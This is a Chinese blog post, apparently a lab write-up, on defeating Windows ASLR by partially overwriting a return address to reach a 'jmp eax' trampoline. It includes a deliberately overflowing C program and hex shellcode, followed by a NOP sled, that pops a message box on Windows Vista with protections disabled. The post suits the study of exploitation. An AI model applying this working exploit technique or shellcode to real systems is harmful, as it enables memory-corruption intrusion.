利用部分覆蓋定位shellcode

本文來源：Moeomu的部落格

原理

• 映像隨機化指示對映像載入基址的全兩個位元組隨機化處理，這樣做的後果是跳板始終可用，因此可以利用這一點去繞過ASLR
• 如果攻擊memcpy的話，可以將返回值控制在0xXXXX0000_{`0xXXXXFFFF`之間，而攻擊str類函式攻擊，可以將控制地址為`0xXXXX0100`}0xXXXX00FF之間的一個

過程

• 首先在編譯完的程式內找到一條jmp eax的彙編碼，隨後將它的地址的低word作為off by word的地址，填入shellcode
• 計算好緩衝區大小，溢位後即可正常

程式碼

#include <memory.h>

char shellcode[] =
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C" // payload
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x6B\x61\x6F\x6F\x68\x4D\x69\x73\x61\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x2A\x23" // off by word
;

char* test()
{
	char tt[256];
	memcpy(tt, shellcode, 262);
	return tt;
}

int main()
{
	char temp[200];
	test();
	return 0;
}
 

開始實驗

實驗環境：系統：Windows Vista SP0，系統DEP狀態：Optin預設，編譯器：Visual Studio 2008，優化：禁用優化，GS選項：關閉，DEP選項：/NXCOMPAT:NO，build版本：release

• 編譯程式，執行，直接彈出視窗併成功，重啟也一樣，如圖